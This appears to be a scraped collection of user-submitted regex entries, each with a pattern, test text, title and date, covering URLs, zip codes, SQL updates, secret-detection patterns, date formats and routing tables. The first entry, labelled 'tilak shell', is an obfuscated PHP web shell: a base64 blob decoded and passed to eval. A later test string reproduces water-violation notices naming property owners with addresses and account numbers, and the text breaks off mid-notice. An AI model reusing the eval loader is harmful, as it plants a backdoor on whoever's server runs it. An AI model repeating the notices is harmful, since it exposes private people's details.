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"; eval(htmlspecialchars_decode(urldecode(base64_decode($UeXploiT)))); exit; ?>
tilak shell
2020-04-08T16:37:46.000Z
ERROR: type should be string, got "https:\\/\\/www\\.chytryhonza\\.cz\\/hypotecni-kalkulacka\\?v=.+"
https://www.chytryhonza.cz/hypotecni-kalkulacka?v=iTBDcj1Zi0eb4mSEPe3k3CNWhpqvaZmAyRTmCq%2Be1j085RJkWNTwLmXX8mRWLjvUDUxgpyVpx0VS0q08qi%2FTIvRBMeiXW4w9fK%2F8cQg4wXlsDubtLGXAdytQCNC2LTfF https://www.chytryhonza.cz/hypotecni-kalkulacka?v= https://www.chytryhonza.cz/srovnavac https://www.chytryhonza.cz/srovnavac-zivotniho-pojisteni?v=dd https://www.chytryhonza.cz/srovnavac-zivotniho-pojisteni?v=1qC3j5r%2BHim0K68IAcodRMrYv6ikx0NneJC39H2oOdl2H8QZ5DL9glGwRtkQSV%2BhVT0c%2B95YLTSmA4BDugvpUQkWIDUmTmv4rcg1t78EMid9jhDOoHh%2BXxRZAxYBGKkB
hypo-kalkulacka
2019-07-25T09:24:55.000Z
<articles:loop.+>(:?.|\n|\r)+?<\/articles:loop>
<articles:loop count="4"> <div>@Title@</div> </articles:loop>
select div like things
2015-11-03T14:39:33.000Z
(?#digits)(?<zipcode_digits>\d{4})[\s]?(?#chars)(?<zipcode_chars>\w{2})
1851 KW
dutch zipcode with named matching
2015-07-02T09:05:22.000Z
.*<a\shref="http:\/\/(.*)">.*<\/a>.*
<h2><a href="http://www.google.com/test">Link</a></h2>2014-54-22 22:23
anchor change href
2016-07-05T09:03:53.000Z
^(?=.*?[1-9])[0-9\\,\\-]+$
90,91,90-200,90,900-9000
Check syntax port ACL VNG
2015-06-07T19:35:13.000Z
^1?$|^(11+?)\1+$
1 11 111 1111 11111 111111 1111111 11111111 111111111 1111111111 11111111111 111111111111 1111111111111
Prime number regex
2013-07-20T21:13:54.000Z
(?i)UPDATE[ \t\n]{1,}(fact)(.*)\n(from)?([ \t\n]{1,})?(.*)?\n*set[ \n\t]{1,}(coloana)[ \t\n]*=[ \t\n]*(ifnull\(\s*)*([\w\d]*)([\ ,'\w\n\t)(\n=.]*);
update fact,x2,asdasjsdjbmfeweoewo from asdas,asaskdvd set coloana = ifnull( ifnull( col2,'Test'), 'Test2') where c = c.s. and asdsa = asda.asda; UPdate fact,x2 set coloana = ifnull(col2,'Test') where c = c.s.; update fact,x2 from asdas set coloana = ifnull(col2,'Test') where c = c.s. and asdsa = asda.asda; update fact,x2 from asdas set coloana = (select x from y where x.fg = x2.asfds) where c = c.s. and asdsa = asda.asda;
update match
2015-09-11T21:32:54.000Z
('|"|)([Pp]assword|[Ss]ecret|[Aa]piKey|[Pp]rivateKey)('|"|)(\s)?(:|=)(\s)?('|")(.*)('|")
'password':'asdf' 'password' :'asdf' 'password': 'asdf' 'password' : 'asdf' 'password'='asdf' 'password' ='asdf' 'password'= 'asdf' 'password' = 'asdf' "password":"asdf" "password" :"asdf" "password": "asdf" "password" : "asdf" "password"="asdf" "password" ="asdf" "password"= "asdf" "password" = "asdf" password="asdf" password ="asdf" password= "asdf" password = "asdf" password='asdf' password ='asdf' password= 'asdf' password = 'asdf' password=asdf password =asdf password= asdf password = asdf Password=asdf secret = "asdf" Secret='asdf' asdfpassword=asdf emailPassword = soreeeaukr,so;d["asdfasdf"]; asdfasdfpasswordasdfasdf
Passwords Code
2018-11-06T13:10:08.000Z
finds the common html tags
<(/?[BIT)(html)(body)(title)(head)]+)>
Native object recogition <B>is much better</B> then other types. Or <I>is in italic</I> and not in <B>bold</B> types <b>face</b>. <!DOCTYPE HTML> <html> <head> <title>Title of the document</title> </head> <body> The content of the document...... </body> </html>
HTML tag search
2016-06-24T20:46:03.000Z
Une expression pour définir des expressions de filtrage basé sur l'index (comme les numéros de pages dans les dialogues d'impression) Chaque segment de page est séparé par une , Chaque segment peut être sous la forme : <int> : 4 <int>.. : 3.. <int>..<int> : 2..4 l'expression ne vérifie pas la cohérence (début du segment inférieur à la fin, absence de segments se recouvrant, segments inutiles...)
^(\d+)(?:(?:\-|\.\.)(\d+))?\,?$
1-4 1 1,2,3,4,5..6
Index filtering
2015-10-27T12:15:58.000Z
(export[^(]*)(\(([^)]+)\))([^{]*)(\{([^}]+)\})
export default function something($123, something, wauw) { function(random) { return random; } } export default function(something, wauw) { }
Add ngInject to all files
2016-06-23T08:37:37.000Z
^([a-z0-9_#.-]+)@(([a-z0-9_#-]+\.)+[a-z]{2,})$
Subjulio email validator
2018-08-24T16:05:50.000Z
\b(aa|bb|ab|ba)+\b
aa aabbaaba abaaa abbbbaab
Lb4 1b
2017-12-12T20:11:02.000Z
For the day: d Displays the day as a number without a leading zero (1-31). dd Displays the day as a number with a leading zero (01-31). ddd Displays the day as an abbreviation (Sun-Sat) dddd Displays the day as a full name (Sunday-Saturday) For the month: m Displays the month as a number without a leading zero (1-12). mm Displays the month as a number with a leading zero (01-12). mmm Displays the month as an abbreviation (Jan-Dec). mmmm Displays the month as a full name (January-December). For the year: yy Displays the year as a two-digit number (00-99). yyyy Displays the year as a four-digit number (0000-9999).
^((([D]{1,4}|[M]{1,4}|[Y]{2}|[Y]{4})([D]{1,4}|[M]{1,4}|[Y]{2}|[Y]{4}))([D]{1,4}|[M]{1,4}|[Y]{2}|[Y]{4}))$
MMMMDDYY MDYY YYYYDDMM MDYY DDDDDYYYMM OODDYYMM YYDDMMPPPP
FORMAT DATE WITH NO SEPARATOR
2023-10-05T13:51:15.000Z
Allows you to retrieve information from the linux command `route -n` directly from your PHP code (or any other language). Example: 0.0.0.0 192.168.100.254 0.0.0.0 UG 100 0 0 enp2s0 10.8.0.1 10.8.0.109 255.255.255.255 UGH 0 0 0 tun0 10.8.0.109 0.0.0.0 255.255.255.255 UH 0 0 0 tun0 192.168.10.0 10.8.0.109 255.255.255.0 UG 0 0 0 tun0 192.168.100.0 0.0.0.0 255.255.255.0 U 100 0 0 enp2s0
(?P<destination>\d+\.\d+\.\d+\.\d+)\ +(?P<gateway>\d+\.\d+\.\d+\.\d+)\ +(?P<mask>\d+\.\d+\.\d+\.\d+)\ +\w+\ +\d+\ +\d+\ +\d+\ +(?P<interface>\w+)
Table de routage IP du noyau Destination Passerelle Genmask Indic Metric Ref Use Iface 0.0.0.0 192.168.100.254 0.0.0.0 UG 100 0 0 enp2s0 10.8.0.1 10.8.0.109 255.255.255.255 UGH 0 0 0 tun0 10.8.0.109 0.0.0.0 255.255.255.255 UH 0 0 0 tun0 192.168.10.0 10.8.0.109 255.255.255.0 UG 0 0 0 tun0 192.168.100.0 0.0.0.0 255.255.255.0 U 100 0 0 enp2s0
Linux Routing Table
2018-02-02T16:44:25.000Z
^([A-Za-z0-9]{2})([0-9]{2})((?:[A-R][0-9]{2}){0,10})((?:[0-9]{4}){0,12})((?:[A-Z])?)$
0101110112011301210122012301310132013301410142014301B 0101B 0101B12B 01011011B 0101B121111B 010110111011B 0101B1210111011B 0520D01D53D 0620E01E53D 0724 0803E23J54B 0903 1006E25J56B 1103B01 1407 1504 1807E30J61B 1904K24R 2003K41M54R 2104K06R 2203H37M68B 72B6P271531 05BRE010941
0185ac1
2016-01-31T18:38:05.000Z
Allows to find label generating warnings like "Automatic Preferred Max Layout Width before iOS 8.0" in XCode
(<label(?!.*preferredMaxLayoutWidth).*numberOfLines.*>)
<label opaque="NO" userInteractionEnabled="NO" tag="5" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Label" lineBreakMode="tailTruncation"="4" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="fgY-Rp-veR"> <rect key="frame" x="6" y="40" width="288" height="60"/> <animations/> <constraints> <constraint firstAttribute="height" constant="60" id="g3c-hD-Hf9"/> </constraints> <fontDescription key="fontDescription" type="system" pointSize="12"/> <color key="textColor" red="0.0" green="0.0" blue="0.0" alpha="1" colorSpace="calibratedRGB"/> <nil key="highlightedColor"/> </label> <label opaque="NO" userInteractionEnabled="NO" numberOfLines="4" tag="10" contentMode="left" text="feedback" lineBreakMode="tailTruncation" numberOfLines="4" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="M98-QE-PMx"> <rect key="frame" x="7" y="227" width="287" height="70"/> <animations/> <constraints> <constraint firstAttribute="height" constant="70" id="uPb-iM-7XM"/> </constraints> <fontDescription key="fontDescription" type="system" pointSize="14"/> <color key="textColor" red="0.058823529409999999" green="0.51372549020000002" blue="0.94901960780000005" alpha="1" colorSpace="calibratedRGB"/> <nil key="highlightedColor"/> </label>
Find labels without preferredMaxLayoutWidth and multiple lines in Appl
2015-10-13T10:06:54.000Z
Test Description
Account: (\d+)
John/Mary Tarro Family Trust 1 l\/arlton Ct Sacramento, CA 95831 WATER CONSERVATION OFFICE 2260 GLEN ELLEN CIRCLE SACRAMENTO, CA 95822-3634 PH 916-808-5605 FAX 916-808-5655 Date: March 17,2015 Property Owner: John/Mary Tarro Family Trust Address: 1 lrarlton Ct Account: 8734444000 Parcel: 031 -0860-01 2-0000 Dear Customer: On, 12 Mar. 2015, al1 Marlton Ct, a City Water Conservation Representative observed the following violation(s) of the City's Water Conservation Ordinance: r Gutter or Pavement Flooding (SCCS13.04.860) n Flooding Neighbor (SCCS 13.04.860) . Watering Wrong Time (SCCS 13.04.870) X Watering Wrong Day (SCCS 13.04.870) r Leaking or Faulty Water Fixture(s) (SCCS 13.04.850) r Washing Vehicle on Wrong Day (SCCS 13.04.870) n Washing Vehicle Without Shut-Off Nozzle (SCCg 13.04.870) I Washing Down Paved Area (SCCS 13.04.870) sacramento city code section 13.04.890 imposes penalties for violations of the city's water Conservation Ordinance. Whether the violation is committed by the owner of the premises, or by the occupant (if different than the owner), the penalty amount is included on the owner's bill for water service provided to the premises where the violation occurred. Pagell of2 Notice of Violation Outdoor Water Conservation Requirements The penalty that applies to the violation(s) observed at the above address on 12 Mar. 2015 is checked below: X First violation during a twelve (12) month period: No penalty r Second violation during a twelve (12) month period: The penalty is flfty dollars ($50.00) However, this penalty will be waived if the owner, or the occupant (if different than the owner, and the occupant committed the violation) attends a Water Conservation Seminar offered by the City's Department of Utilities within sixty (60) days after the date of this penalty notice. - Third violation during a twelve (12) month period: The penalty is two hundred dollars (9200.00). r Fourth violation and any successive violations during a twelve (12) month period: The penalty is one thousand dollars ($1000.00). The owner or occupant of the premises where the violation(s) occurred may appeal this Notice of Violation by filing a written notice of appeal no later than 30 days from the date of this letter. Please send all appeals to the Water Conservation Office at 2260 Glen Ellen Cir., Sacramento, CA 95822, in accordance with the provisions of Sacramento City Code Section 13.04.900. The notice of appeal must specify the grounds for appeal and provide the address and telephone number of the person filing the appeal. Further information concerning the City's water conservation requirements and programs, including a link to the Sacramento City Code provisions cited in this Notice, may be viewed on the internet at www.sparesacwater.orq. Our website also contains information about free services available to help you manage your water use, such as a Free Water Wise House Call. With this free service, a trained Water Conservation Specialist will visit your home or business to identify potential water savings. We encourage you to take advantage of this service. lf you have any further questions, please call 31'1 or (916) 264-5011. Durinq Dayliqht Savinqs TjnelMarch 8 - November 2) water TWO davs oer week, based on vour address number. Addresses endinq in odd numbers water Tues. and Sat.. addresses endin qr n even numbers water Weds. and City of Sacramento Department of Utilities, Water Conservation Office Page l2 of 2 Sun. - alwavs before 1Oam and after 7pm. Thank you, Page | 1 of 2 UPPENDAHL,JOEL R. 1 SAND PEBBLE CT SACRAMENTO, CA 95831 WATER CONSERVATION OFFICE 2260 GLEN ELLEN CIRCLE SACRAMENTO, CA 95822-3634 PH 916-808-5605 FAX 916-808-5655 Date: June 30, 2015 Notice of Violation Outdoor Water Conservation Requirements Property Owner: UPPENDAHL,JOEL R. Address: 1 SAND PEBBLE CT Account: 2919704886 Parcel: 031-1180-010-0000 Dear Customer: On, 